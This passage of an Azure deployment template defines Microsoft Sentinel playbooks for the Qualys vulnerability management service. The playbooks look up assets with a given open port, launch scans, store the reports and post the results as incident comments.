limited to @{variables('ResultLimit')} devices (Incident comment has limitation of 30000 characters): \n@{body('Create_HTML_table')}" + } + }, + "Create_HTML_table": { + "runAfter": { + "For_each_Host_in_result": [ + "Succeeded" + ] + }, + "type": "Table", + "inputs": { + "format": "HTML", + "from": "@variables('OutputArray')" + } + }, + "For_each_Host_in_result": { + "foreach": "@body('Parse_Search_Result_JSON')?['ServiceResponse']?['data']", + "actions": { + "Append_to_Output_Array": { + "runAfter": { + "Compose_Result": [ + "Succeeded" + ] + }, + "type": "AppendToArrayVariable", + "inputs": { + "name": "OutputArray", + "value": "@outputs('Compose_Result')" + } + }, + "Compose_Result": { + "runAfter": { + "For_each_Open_Port": [ + "Succeeded" + ] + }, + "type": "Compose", + "inputs": { + "FQDN": "@items('For_each_Host_in_result')?['HostAsset']?['fqdn']", + "Hostname": "@items('For_each_Host_in_result')?['HostAsset']?['netbiosName']", + "IPAddress": "@items('For_each_Host_in_result')?['HostAsset']?['address']", + "OS": "@items('For_each_Host_in_result')?['HostAsset']?['os']", + "OpenPorts": "@join(variables('OpenPorts'), ',')" + } + }, + "For_each_Open_Port": { + "foreach": "@items('For_each_Host_in_result')?['HostAsset']?['openPort']?['list']", + "actions": { + "Append_to_array_variable": { + "runAfter": { + "Parse_Open_Port_List_JSON": [ + "Succeeded" + ] + }, + "type": "AppendToArrayVariable", + "inputs": { + "name": "OpenPorts", + "value": "@body('Parse_Open_Port_List_JSON')?['port']" + } + }, + "Parse_Open_Port_List_JSON": { + "type": "ParseJson", + "inputs": { + "content": "@items('For_each_Open_Port')?['HostAssetOpenPort']", + "schema": { + "properties": { + "port": { + "type": "integer" + }, + "protocol": { + "type": "string" + }, + "serviceId": { + "type": "integer" + }, + "serviceName": { + "type": "string" + } + }, + "type": "object" + } + } + } + }, + "type": "Foreach" + }, + "Reset_Variable_OpenPorts": { + "runAfter": { + "Append_to_Output_Array": [ + "Succeeded" + ] + }, + "type": "SetVariable", + "inputs": { + "name": "OpenPorts", + "value": "[variables('TemplateEmptyArray')]" + } + } + }, + "type": "Foreach", + "runtimeConfiguration": { + "concurrency": { + "repetitions": 1 + } + } + } + }, + "runAfter": { + "Parse_Search_Result_JSON": [ + "Succeeded" + ] + }, + "else": { + "actions": { + "Append_Asset_Search_Failure_msg_to_Incident_Comment": { + "type": "AppendToStringVariable", + "inputs": { + "name": "IncidentCommet", + "value": "Asset Search Qualys API call failed.\n@{slice(string(body('Parse_Search_Result_JSON')), 0, 1000)}\n" + } + } + } + }, + "expression": { + "and": [ + { + "equals": [ + "@body('Parse_Search_Result_JSON')?['ServiceResponse']?['responseCode']", + "SUCCESS" + ] + } + ] + }, + "type": "If" + }, + "For_each_Alert_in_Incident_get_all_Ports": { + "foreach": "@triggerBody()?['object']?['properties']?['Alerts']", + "actions": { + "For_each_Port": { + "foreach": "@body('Parse_Cutom_Details_Section')?['NetworkPort']", + "actions": { + "Append_to_array_Ports": { + "type": "AppendToArrayVariable", + "inputs": { + "name": "Ports", + "value": "@items('For_each_Port')" + } + } + }, + "runAfter": { + "Parse_Cutom_Details_Section": [ + "Succeeded" + ] + }, + "type": "Foreach" + }, + "Parse_Additional_Data_Section": { + "type": "ParseJson", + "inputs": { + "content": "@items('For_each_Alert_in_Incident_get_all_Ports')?['properties']?['additionalData']", + "schema": { + "properties": { + "Alert generation status": { + "type": "string" + }, + "AlertMessageEnqueueTime": { + "type": "string" + }, + "Analytic Rule Ids": { + "type": "string" + }, + "Analytic Rule Name": { + "type": "string" + }, + "Correlation Id": { + "type": "string" + }, + "Custom Details": { + "type": [ + "string", + "null" + ] + }, + "Data Sources": { + "type": "string" + }, + "Event Grouping": { + "type": "string" + }, + "ProcessedBySentinel": { + "type": "string" + }, + "Query": { + "type": "string" + }, + "Query End Time UTC": { + "type": "string" + }, + "Query Period": { + "type": "string" + }, + "Query Start Time UTC": { + "type": "string" + }, + "Search Query Results Overall Count": { + "type": "string" + }, + "Trigger Operator": { + "type": "string" + }, + "Trigger Threshold": { + "type": "string" + } + }, + "type": "object" + } + } + }, + "Parse_Cutom_Details_Section": { + "runAfter": { + "Parse_Additional_Data_Section": [ + "Succeeded" + ] + }, + "type": "ParseJson", + "inputs": { + "content": "@body('Parse_Additional_Data_Section')?['Custom Details']", + "schema": { + "properties": { + "NetworkPort": { + "items": { + "type": "string" + }, + "type": "array" + } + }, + "type": "object" + } + } + } + }, + "runAfter": { + "Initialize_variable_-_ResultLimit": [ + "Succeeded" + ] + }, + "type": "Foreach" + }, + "Initialize_variable_-_IncidentComment": { + "runAfter": { + "Initialize_variable_-_Ports": [ + "Succeeded" + ] + }, + "type": "InitializeVariable", + "inputs": { + "variables": [ + { + "name": "IncidentCommet", + "type": "string" + } + ] + } + }, + "Initialize_variable_-_OpenPorts": { + "runAfter": { + "Initialize_variable_-_OutputArray": [ + "Succeeded" + ] + }, + "type": "InitializeVariable", + "inputs": { + "variables": [ + { + "name": "OpenPorts", + "type": "array" + } + ] + } + }, + "Initialize_variable_-_OutputArray": { + "runAfter": { + "Initialize_variable_-_IncidentComment": [ + "Succeeded" + ] + }, + "type": "InitializeVariable", + "inputs": { + "variables": [ + { + "name": "OutputArray", + "type": "array" + } + ] + } + }, + "Initialize_variable_-_Ports": { + "type": "InitializeVariable", + "inputs": { + "variables": [ + { + "name": "Ports", + "type": "array" + } + ] + } + }, + "Initialize_variable_-_ResultLimit": { + "runAfter": { + "Initialize_variable_-_OpenPorts": [ + "Succeeded" + ] + }, + "type": "InitializeVariable", + "inputs": { + "variables": [ + { + "name": "ResultLimit", + "type": "string", + "value": "50" + } + ] + } + }, + "Parse_Asset_Count_JSON": { + "runAfter": { + "Asset_Count_for_Port": [ + "Succeeded" + ] + }, + "type": "ParseJson", + "inputs": { + "content": "@body('Asset_Count_for_Port')", + "schema": { + "properties": { + "ServiceResponse": { + "properties": { + "count": { + "type": "integer" + }, + "responseCode": { + "type": "string" + } + }, + "type": "object" + } + }, + "type": "object" + } + } + }, + "Parse_Search_Result_JSON": { + "runAfter": { + "Search_Asset_By_Port": [ + "Succeeded" + ] + }, + "type": "ParseJson", + "inputs": { + "content": "@body('Search_Asset_By_Port')", + "schema": { + "properties": { + "ServiceResponse": { + "properties": { + "count": { + "type": "integer" + }, + "data": { + "items": { + "properties": { + "HostAsset": { + "properties": { + "address": { + "type": "string" + }, + "biosDescription": { + "type": "string" + }, + "created": { + "type": "string" + }, + "dnsHostName": { + "type": "string" + }, + "fqdn": { + "type": "string" + }, + "id": { + "type": "integer" + }, + "isDockerHost": { + "type": "string" + }, + "lastSystemBoot": { + "type": "string" + }, + "lastVulnScan": { + "type": "string" + }, + "manufacturer": { + "type": "string" + }, + "model": { + "type": "string" + }, + "modified": { + "type": "string" + }, + "name": { + "type": "string" + }, + "netbiosName": { + "type": "string" + }, + "networkGuid": { + "type": "string" + }, + "networkInterface": { + "properties": { + "list": { + "items": { + "properties": { + "HostAssetInterface": { + "properties": { + "address": { + "type": "string" + }, + "hostname": { + "type": "string" + }, + "macAddress": { + "type": "string" + } + }, + "type": "object" + } + }, + "required": [ + "HostAssetInterface" + ], + "type": "object" + }, + "type": "array" + } + }, + "type": "object" + }, + "openPort": { + "properties": { + "list": { + "items": { + "properties": { + "HostAssetOpenPort": { + "properties": { + "port": { + "type": "integer" + }, + "protocol": { + "type": "string" + } + }, + "type": "object" + } + }, + "required": [ + "HostAssetOpenPort" + ], + "type": "object" + }, + "type": "array" + } + }, + "type": "object" + }, + "os": { + "type": "string" + }, + "processor": { + "properties": { + "list": { + "items": { + "properties": { + "HostAssetProcessor": { + "properties": { + "name": { + "type": "string" + } + }, + "type": "object" + } + }, + "required": [ + "HostAssetProcessor" + ], + "type": "object" + }, + "type": "array" + } + }, + "type": "object" + }, + "qwebHostId": { + "type": "integer" + }, + "software": { + "properties": { + "list": { + "items": { + "properties": { + "HostAssetSoftware": { + "properties": { + "name": { + "type": "string" + }, + "version": { + "type": "string" + } + }, + "type": "object" + } + }, + "required": [ + "HostAssetSoftware" + ], + "type": "object" + }, + "type": "array" + } + }, + "type": "object" + }, + "trackingMethod": { + "type": "string" + }, + "type": { + "type": "string" + }, + "vuln": { + "properties": { + "list": { + "items": { + "properties": { + "HostAssetVuln": { + "properties": { + "firstFound": { + "type": "string" + }, + "hostInstanceVulnId": { + "type": "integer" + }, + "lastFound": { + "type": "string" + }, + "qid": { + "type": "integer" + } + }, + "type": "object" + } + }, + "required": [ + "HostAssetVuln" + ], + "type": "object" + }, + "type": "array" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "required": [ + "HostAsset" + ], + "type": "object" + }, + "type": "array" + }, + "hasMoreRecords": { + "type": "string" + }, + "lastId": { + "type": "integer" + }, + "responseCode": { + "type": "string" + } + }, + "type": "object" + } + }, + "type": "object" + } + } + }, + "Search_Asset_By_Port": { + "runAfter": { + "For_each_Alert_in_Incident_get_all_Ports": [ + "Succeeded" + ] + }, + "type": "ApiConnection", + "inputs": { + "body": "\n\t\n\t\t@{variables('ResultLimit')}\n\t\n \n @{first(variables('Ports'))}\n \n", + "headers": { + "Accept": "application/json", + "Content-Type": "text/xml", + "X-Requested-With": "Sentinel" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['QualysCustomConnector']['connectionId']" + } + }, + "method": "post", + "path": "/qps/rest/2.0/search/am/hostasset" + } + }, + "Terminate": { + "runAfter": { + "For_each_Alert_in_Incident_get_all_Ports": [ + "Failed" + ] + }, + "type": "Terminate", + "inputs": { + "runError": { + "code": "FAIL", + "message": "Custom Details mapping in Analytical Rule is missing or misconfigured." + }, + "runStatus": "Failed" + } + } + } + }, + "parameters": { + "$connections": { + "value": { + "QualysCustomConnector": { + "connectionId": "[[resourceId('Microsoft.Web/connections', variables('QualyscustomconnectorConnectionName'))]", + "connectionName": "[[variables('QualyscustomconnectorConnectionName')]", + "id": "[[concat('/subscriptions/', subscription().subscriptionId, '/resourceGroups/', resourceGroup().name, '/providers/Microsoft.Web/customApis/', parameters('CustomConnectorName'))]" + }, + "azuresentinel": { + "connectionId": "[[resourceId('Microsoft.Web/connections', variables('MicrosoftSentinelConnectionName'))]", + "connectionName": "[[variables('MicrosoftSentinelConnectionName')]", + "id": "[[concat('/subscriptions/', subscription().subscriptionId, '/providers/Microsoft.Web/locations/', variables('workspace-location-inline'), '/managedApis/Azuresentinel')]", + "connectionProperties": { + "authentication": { + "type": "ManagedServiceIdentity" + } + } + } + } + } + } + }, + "name": "[[parameters('PlaybookName')]", + "type": "Microsoft.Logic/workflows", + "location": "[[variables('workspace-location-inline')]", + "tags": { + "hidden-SentinelTemplateName": "QualysVM-GetAssets-ByOpenPort", + "hidden-SentinelTemplateVersion": "1.0", + "hidden-SentinelWorkspaceId": "[[variables('workspaceResourceId')]" + }, + "identity": { + "type": "SystemAssigned" + }, + "apiVersion": "2017-07-01", + "dependsOn": [ + "[[resourceId('Microsoft.Web/connections', variables('QualyscustomconnectorConnectionName'))]", + "[[resourceId('Microsoft.Web/connections', variables('MicrosoftSentinelConnectionName'))]" + ] + }, + { + "type": "Microsoft.Web/connections", + "apiVersion": "2016-06-01", + "name": "[[variables('QualyscustomconnectorConnectionName')]", + "location": "[[variables('workspace-location-inline')]", + "kind": "V1", + "properties": { + "displayName": "[[variables('QualyscustomconnectorConnectionName')]", + "api": { + "id": "[[variables('_connection-2')]" + } + } + }, + { + "type": "Microsoft.Web/connections", + "apiVersion": "2016-06-01", + "name": "[[variables('MicrosoftSentinelConnectionName')]", + "location": "[[variables('workspace-location-inline')]", + "kind": "V1", + "properties": { + "displayName": "[[variables('MicrosoftSentinelConnectionName')]", + "parameterValueType": "Alternative", + "api": { + "id": "[[variables('_connection-3')]" + } + } + }, + { + "type": "Microsoft.OperationalInsights/workspaces/providers/metadata", + "apiVersion": "2022-01-01-preview", + "name": "[concat(parameters('workspace'),'/Microsoft.SecurityInsights/',concat('Playbook-', last(split(variables('playbookId4'),'/'))))]", + "properties": { + "parentId": "[variables('playbookId4')]", + "contentId": "[variables('_playbookContentId4')]", + "kind": "Playbook", + "version": "[variables('playbookVersion4')]", + "source": { + "kind": "Solution", + "name": "QualysVM", + "sourceId": "[variables('_solutionId')]" + }, + "author": { + "name": "Microsoft", + "email": "[variables('_email')]" + }, + "support": { + "name": "Microsoft Corporation", + "email": "support@microsoft.com", + "tier": "Microsoft", + "link": "https://support.microsoft.com" + }, + "dependencies": { + "criteria": [ + { + "kind": "LogicAppsCustomConnector", + "contentId": "[variables('_QualysCustomConnector')]", + "version": "[variables('playbookVersion1')]" + } + ] + } + } + } + ], + "metadata": { + "title": "QualysVM-GetAssets-ByOpenPort", + "description": "When a new sentinel incident is created, this playbook gets triggered and performs the following actions: \n 1. Gets Port from incident. (Only one port) \n 2. Search the Qualys platform and get the asset count with open port. \n 3. Search the Qualys platform and get the asset details as well. (Asset details limited to 50 assets, since incident comment has limitaion of 30000 characters.) \n 4. Combine both the results. \n 5. Add the info as comment to the incident.", + "prerequisites": [ + "1. Prior to the deployment of this playbook, Qualys Logic App Custom Connector needs to be deployed under the same subscription.", + "2. Refer to [Qualys Logic App Custom Connector](../QualysCustomConnector/readme.md) documentation for deployment instructions." + ], + "postDeployment": [ + "None" + ], + "lastUpdateTime": "2022-09-13T22:25:52Z", + "tags": [ + "Qualys", + "Enrichment", + "VM Report" + ], + "releaseNotes": { + "version": "1.0", + "title": "[variables('blanks')]", + "notes": [ + "Initial version" + ] + } + } + }, + "packageKind": "Solution", + "packageVersion": "[variables('_solutionVersion')]", + "packageName": "[variables('_solutionName')]", + "packageId": "[variables('_solutionId')]", + "contentSchemaVersion": "3.0.0", + "contentId": "[variables('_playbookContentId4')]", + "contentKind": "Playbook", + "displayName": "QualysVM-GetAssets-ByOpenPort", + "contentProductId": "[variables('_playbookcontentProductId4')]", + "id": "[variables('_playbookcontentProductId4')]", + "version": "[variables('playbookVersion4')]" + } + }, + { + "type": "Microsoft.OperationalInsights/workspaces/providers/contentTemplates", + "apiVersion": "2023-04-01-preview", + "name": "[variables('playbookTemplateSpecName5')]", + "location": "[parameters('workspace-location')]", + "dependsOn": [ + "[extensionResourceId(resourceId('Microsoft.OperationalInsights/workspaces', parameters('workspace')), 'Microsoft.SecurityInsights/contentPackages', variables('_solutionId'))]" + ], + "properties": { + "description": "QualysVM-LaunchVMScan-GenerateReport Playbook with template version 3.0.0", + "mainTemplate": { + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "[variables('playbookVersion5')]", + "parameters": { + "PlaybookName": { + "defaultValue": "QualysVM-LaunchVMScan-GenerateReport", + "type": "string", + "metadata": { + "description": "Name of the logic app resource to be created." + } + }, + "CustomConnectorName": { + "defaultValue": "QualysCustomConnector", + "type": "string", + "metadata": { + "description": "Name of the logic app connector which performs Qualys actions." + } + }, + "StorageAccountName": { + "defaultValue": "", + "type": "string", + "metadata": { + "description": "Name of the storage account to store Qualys reports." + } + } + }, + "variables": { + "QualyscustomconnectorConnectionName": "[[concat('Qualyscustomconnector-', parameters('PlaybookName'))]", + "AzureBlobStorageName": "[[parameters('StorageAccountName')]", + "AzureblobConnectionName": "[[concat('Azureblob-', parameters('PlaybookName'))]", + "MicrosoftSentinelConnectionName": "[[concat('MicrosoftSentinel-', parameters('PlaybookName'))]", + "StorageAccountId": "[[resourceId('Microsoft.Storage/storageAccounts', variables('AzureBlobStorageName'))]", + "connection-2": "[[concat('/subscriptions/', subscription().subscriptionId, '/resourceGroups/', resourceGroup().name, '/providers/Microsoft.Web/customApis/', parameters('CustomConnectorName'))]", + "_connection-2": "[[variables('connection-2')]", + "connection-3": "[[concat('/subscriptions/', subscription().subscriptionId, '/providers/Microsoft.Web/locations/', variables('workspace-location-inline'), '/managedApis/Azureblob')]", + "_connection-3": "[[variables('connection-3')]", + "connection-4": "[[concat('/subscriptions/', subscription().subscriptionId, '/providers/Microsoft.Web/locations/', variables('workspace-location-inline'), '/managedApis/Azuresentinel')]", + "_connection-4": "[[variables('connection-4')]", + "workspace-location-inline": "[concat('[resourceGroup().locatio', 'n]')]", + "workspace-name": "[parameters('workspace')]", + "workspaceResourceId": "[[resourceId('microsoft.OperationalInsights/Workspaces', variables('workspace-name'))]" + }, + "resources": [ + { + "properties": { + "provisioningState": "Succeeded", + "state": "Enabled", + "definition": { + "$schema": "https://schema.management.azure.com/providers/Microsoft.Logic/schemas/2016-06-01/workflowdefinition.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "$connections": { + "type": "Object" + } + }, + "staticResults": { + "Download_Scan_Report0": { + "status": "Succeeded", + "outputs": { + "statusCode": "OK" + } + } + }, + "triggers": { + "Microsoft_Sentinel_incident": { + "type": "ApiConnectionWebhook", + "inputs": { + "body": { + "callback_url": "@{listCallbackUrl()}" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['azuresentinel']['connectionId']" + } + }, + "path": "/incident-creation" + } + } + }, + "actions": { + "Add_comment_to_incident_(V3)": { + "runAfter": { + "Append_Report_Url_to_Incident_Comment_": [ + "Succeeded", + "Skipped" + ] + }, + "type": "ApiConnection", + "inputs": { + "body": { + "incidentArmId": "@triggerBody()?['object']?['id']", + "message": "

@{variables('IncidentComment')}

" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['azuresentinel']['connectionId']" + } + }, + "method": "post", + "path": "/Incidents/Comment" + } + }, + "Append_Report_Url_to_Incident_Comment_": { + "runAfter": { + "Compose_Comment": [ + "Succeeded" + ] + }, + "type": "AppendToStringVariable", + "inputs": { + "name": "IncidentComment", + "value": "@outputs('Compose_Comment')" + } + }, + "Check_if_there_is_any_IP_Address_to_Scan": { + "actions": { + "Check_if_Scanner_is_available_then_Run_Scan": { + "actions": { + "Check_Scan_Status": { + "runAfter": { + "Get_Scan_Reference": [ + "Succeeded" + ] + }, + "type": "ApiConnection", + "inputs": { + "headers": { + "X-Requested-With": "Sentinel" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['QualysCustomConnector']['connectionId']" + } + }, + "method": "post", + "path": "/api/2.0/fo/scan/", + "queries": { + "action": "list", + "scan_ref": "@variables('ScanRef')" + } + } + }, + "Get_Scan_Reference": { + "foreach": "@body('Parse_Launch_Scan_Output')?['SIMPLE_RETURN']?['RESPONSE']?['ITEM_LIST']?['ITEM']", + "actions": { + "Check_for_Scan_Reference": { + "actions": { + "Set_variable_-_ScanRef": { + "type": "SetVariable", + "inputs": { + "name": "ScanRef", + "value": "@items('Get_Scan_Reference')?['VALUE']" + } + } + }, + "expression": { + "and": [ + { + "equals": [ + "@items('Get_Scan_Reference')?['KEY']", + "REFERENCE" + ] + } + ] + }, + "type": "If" + } + }, + "runAfter": { + "Parse_Launch_Scan_Output": [ + "Succeeded" + ] + }, + "type": "Foreach" + }, + "Launch_Scan": { + "type": "ApiConnection", + "inputs": { + "headers": { + "X-Requested-With": "Sentinel" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['QualysCustomConnector']['connectionId']" + } + }, + "method": "post", + "path": "/api/2.0/fo/scan/", + "queries": { + "action": "launch", + "ip": "@{join(variables('IPAddrToScan'), ',')}", + "iscanner_name": "@variables('Scanner')", + "option_id": "@body('Parse_Create_Option_Profile_Output')?['SIMPLE_RETURN']?['RESPONSE']?['ITEM_LIST']?['ITEM']?['VALUE']", + "scan_title": "@{concat('SentinelAdHoc_', utcNow())}" + } + } + }, + "Parse_Check_Scan_Status_Output": { + "runAfter": { + "Check_Scan_Status": [ + "Succeeded" + ] + }, + "type": "ParseJson", + "inputs": { + "content": "@json(xml(body('Check_Scan_Status')))", + "schema": { + "properties": { + "SCAN_LIST_OUTPUT": { + "properties": { + "RESPONSE": { + "properties": { + "DATETIME": { + "type": "string" + }, + "SCAN_LIST": { + "properties": { + "SCAN": { + "properties": { + "DURATION": { + "type": "string" + }, + "LAUNCH_DATETIME": { + "type": "string" + }, + "PROCESSED": { + "type": "string" + }, + "PROCESSING_PRIORITY": { + "type": "string" + }, + "REF": { + "type": "string" + }, + "STATUS": { + "properties": { + "STATE": { + "type": "string" + } + }, + "type": "object" + }, + "TARGET": { + "properties": { + "__cdata": { + "type": "string" + } + }, + "type": "object" + }, + "TITLE": { + "properties": { + "__cdata": { + "type": "string" + } + }, + "type": "object" + }, + "TYPE": { + "type": "string" + }, + "USER_LOGIN": { + "type": "string" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + } + }, + "Parse_Launch_Scan_Output": { + "runAfter": { + "Launch_Scan": [ + "Succeeded" + ] + }, + "type": "ParseJson", + "inputs": { + "content": "@json(xml(body('Launch_Scan')))", + "schema": { + "properties": { + "SIMPLE_RETURN": { + "properties": { + "RESPONSE": { + "properties": { + "DATETIME": { + "type": "string" + }, + "ITEM_LIST": { + "properties": { + "ITEM": { + "items": { + "properties": { + "KEY": { + "type": "string" + }, + "VALUE": { + "type": "string" + } + }, + "required": [ + "KEY", + "VALUE" + ], + "type": "object" + }, + "type": "array" + } + }, + "type": "object" + }, + "TEXT": { + "type": "string" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + } + }, + "Set_variable_-_ScanStatus": { + "runAfter": { + "Parse_Check_Scan_Status_Output": [ + "Succeeded" + ] + }, + "type": "SetVariable", + "inputs": { + "name": "ScanStatus", + "value": "@body('Parse_Check_Scan_Status_Output')?['SCAN_LIST_OUTPUT']?['RESPONSE']?['SCAN_LIST']?['SCAN']?['STATUS']?['STATE']" + } + }, + "Wait_Until_Scan_is_finished": { + "actions": { + "Check_Scan_Status_Again": { + "runAfter": { + "Sleep_for_5_minutes": [ + "Succeeded" + ] + }, + "type": "ApiConnection", + "inputs": { + "headers": { + "X-Requested-With": "Sentinel" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['QualysCustomConnector']['connectionId']" + } + }, + "method": "post", + "path": "/api/2.0/fo/scan/", + "queries": { + "action": "list", + "scan_ref": "@variables('ScanRef')" + } + } + }, + "Parse_Check_Scan_Status_Output_Again": { + "runAfter": { + "Check_Scan_Status_Again": [ + "Succeeded" + ] + }, + "type": "ParseJson", + "inputs": { + "content": "@json(xml(body('Check_Scan_Status_Again')))", + "schema": { + "properties": { + "SCAN_LIST_OUTPUT": { + "properties": { + "RESPONSE": { + "properties": { + "DATETIME": { + "type": "string" + }, + "SCAN_LIST": { + "properties": { + "SCAN": { + "properties": { + "DURATION": { + "type": "string" + }, + "LAUNCH_DATETIME": { + "type": "string" + }, + "PROCESSED": { + "type": "string" + }, + "PROCESSING_PRIORITY": { + "type": "string" + }, + "REF": { + "type": "string" + }, + "STATUS": { + "properties": { + "STATE": { + "type": "string" + } + }, + "type": "object" + }, + "TARGET": { + "properties": { + "__cdata": { + "type": "string" + } + }, + "type": "object" + }, + "TITLE": { + "properties": { + "__cdata": { + "type": "string" + } + }, + "type": "object" + }, + "TYPE": { + "type": "string" + }, + "USER_LOGIN": { + "type": "string" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + } + }, + "Set_variable": { + "runAfter": { + "Parse_Check_Scan_Status_Output_Again": [ + "Succeeded" + ] + }, + "type": "SetVariable", + "inputs": { + "name": "ScanStatus", + "value": "@body('Parse_Check_Scan_Status_Output_Again')?['SCAN_LIST_OUTPUT']?['RESPONSE']?['SCAN_LIST']?['SCAN']?['STATUS']?['STATE']" + } + }, + "Sleep_for_5_minutes": { + "type": "Wait", + "inputs": { + "interval": { + "count": 2, + "unit": "Minute" + } + } + } + }, + "runAfter": { + "Set_variable_-_ScanStatus": [ + "Succeeded" + ] + }, + "expression": "@equals(variables('ScanStatus'), 'Finished')", + "limit": { + "count": 60, + "timeout": "PT1H" + }, + "type": "Until" + } + }, + "runAfter": { + "Find_Available_Scanner_": [ + "Succeeded" + ] + }, + "else": { + "actions": { + "Append_to_Incident_Comment_if_no_Scanner_is_online": { + "type": "AppendToStringVariable", + "inputs": { + "name": "IncidentComment", + "value": "No Online Scanner available to launch scan.\n" + } + } + } + }, + "expression": { + "and": [ + { + "not": { + "equals": [ + "@variables('Scanner')", + null + ] + } + } + ] + }, + "type": "If" + }, + "Create_Option_Profile_for_Scan": { + "type": "ApiConnection", + "inputs": { + "headers": { + "X-Requested-With": "Sentinel" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['QualysCustomConnector']['connectionId']" + } + }, + "method": "post", + "path": "/api/2.0/fo/subscription/option_profile/vm/", + "queries": { + "action": "create", + "basic_information_gathering": "all", + "map_tcp_ports_additional": "1", + "map_udp_ports_additional": "1", + "scan_tcp_ports": "full", + "scan_udp_ports": "full", + "title": "@{concat('ScanOptionProfile_', utcNow())}", + "vulnerability_detection": "complete" + } + } + }, + "Find_Available_Scanner_": { + "foreach": "@body('Parse_List_Scanner_Appliance_Output')?['APPLIANCE_LIST_OUTPUT']?['RESPONSE']?['APPLIANCE_LIST']?['APPLIANCE']", + "actions": { + "Check_Scanner_Status": { + "actions": { + "Set_variable_-_Scanner": { + "type": "SetVariable", + "inputs": { + "name": "Scanner", + "value": "@items('Find_Available_Scanner_')?['NAME']" + } + } + }, + "expression": { + "and": [ + { + "equals": [ + "@items('Find_Available_Scanner_')?['STATUS']", + "Online" + ] + } + ] + }, + "type": "If" + } + }, + "runAfter": { + "Parse_List_Scanner_Appliance_Output": [ + "Succeeded" + ] + }, + "type": "Foreach" + }, + "List_Scanner_Appliances": { + "runAfter": { + "Parse_Create_Option_Profile_Output": [ + "Succeeded" + ] + }, + "type": "ApiConnection", + "inputs": { + "headers": { + "X-Requested-With": "Sentinel" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['QualysCustomConnector']['connectionId']" + } + }, + "method": "get", + "path": "/api/2.0/fo/appliance/", + "queries": { + "action": "list" + } + } + }, + "Parse_Create_Option_Profile_Output": { + "runAfter": { + "Create_Option_Profile_for_Scan": [ + "Succeeded" + ] + }, + "type": "ParseJson", + "inputs": { + "content": "@json(xml(body('Create_Option_Profile_for_Scan')))", + "schema": { + "properties": { + "!DOCTYPE": { + "properties": { + "@@name": { + "type": "string" + }, + "@@system": { + "type": "string" + } + }, + "type": "object" + }, + "?xml": { + "properties": { + "@@encoding": { + "type": "string" + }, + "@@version": { + "type": "string" + } + }, + "type": "object" + }, + "SIMPLE_RETURN": { + "properties": { + "RESPONSE": { + "properties": { + "DATETIME": { + "type": "string" + }, + "ITEM_LIST": { + "properties": { + "ITEM": { + "properties": { + "KEY": { + "type": "string" + }, + "VALUE": { + "type": "string" + } + }, + "type": "object" + } + }, + "type": "object" + }, + "TEXT": { + "type": "string" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + } + }, + "Parse_List_Scanner_Appliance_Output": { + "runAfter": { + "List_Scanner_Appliances": [ + "Succeeded" + ] + }, + "type": "ParseJson", + "inputs": { + "content": "@json(xml(body('List_Scanner_Appliances')))", + "schema": { + "properties": { + "APPLIANCE_LIST_OUTPUT": { + "properties": { + "RESPONSE": { + "properties": { + "APPLIANCE_LIST": { + "properties": { + "APPLIANCE": { + "items": { + "properties": { + "ID": { + "type": "string" + }, + "NAME": { + "type": "string" + }, + "RUNNING_SCAN_COUNT": { + "type": "string" + }, + "RUNNING_SLICES_COUNT": { + "type": "string" + }, + "SOFTWARE_VERSION": { + "type": "string" + }, + "STATUS": { + "type": "string" + }, + "UUID": { + "type": "string" + } + }, + "required": [ + "ID", + "UUID", + "NAME", + "SOFTWARE_VERSION", + "RUNNING_SLICES_COUNT", + "RUNNING_SCAN_COUNT", + "STATUS" + ], + "type": "object" + }, + "type": "array" + } + }, + "type": "object" + }, + "DATETIME": { + "type": "string" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + } + } + }, + "runAfter": { + "For_each_IP_Address": [ + "Succeeded" + ] + }, + "else": { + "actions": { + "Append_to_Incident_Comment_If_no_IP_for_a_new_scan": { + "type": "AppendToStringVariable", + "inputs": { + "name": "IncidentComment", + "value": "No IP to launch a new scan.\n" + } + } + } + }, + "expression": { + "and": [ + { + "not": { + "equals": [ + "@length(variables('IPAddrToScan'))", + 0 + ] + } + } + ] + }, + "type": "If" + }, + "Compose_Comment": { + "runAfter": { + "Create_SAS_URI_by_path_(V2)": [ + "Succeeded" + ] + }, + "type": "Compose", + "inputs": "Following Qualys VM Scan Report Generated: @{body('Create_SAS_URI_by_path_(V2)')?['WebUrl']}\n" + }, + "Create_SAS_URI_by_path_(V2)": { + "runAfter": { + "Create_blob_(V2)": [ + "Succeeded" + ] + }, + "type": "ApiConnection", + "inputs": { + "body": { + "Permissions": "Read" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['azureblob']['connectionId']" + } + }, + "method": "post", + "path": "/v2/datasets/@{encodeURIComponent('AccountNameFromSettings')}/CreateSharedLinkByPath", + "queries": { + "path": "@body('Create_blob_(V2)')?['Path']" + } + } + }, + "Create_Scan_Report_Template": { + "runAfter": { + "Check_if_there_is_any_IP_Address_to_Scan": [ + "Succeeded", + "TimedOut" + ] + }, + "type": "ApiConnection", + "inputs": { + "body": "\n\n\t\n\t\t<INFO key=\"title\">\n\t\t\t<![CDATA[@{concat('SentinelScanReportTemplate_', 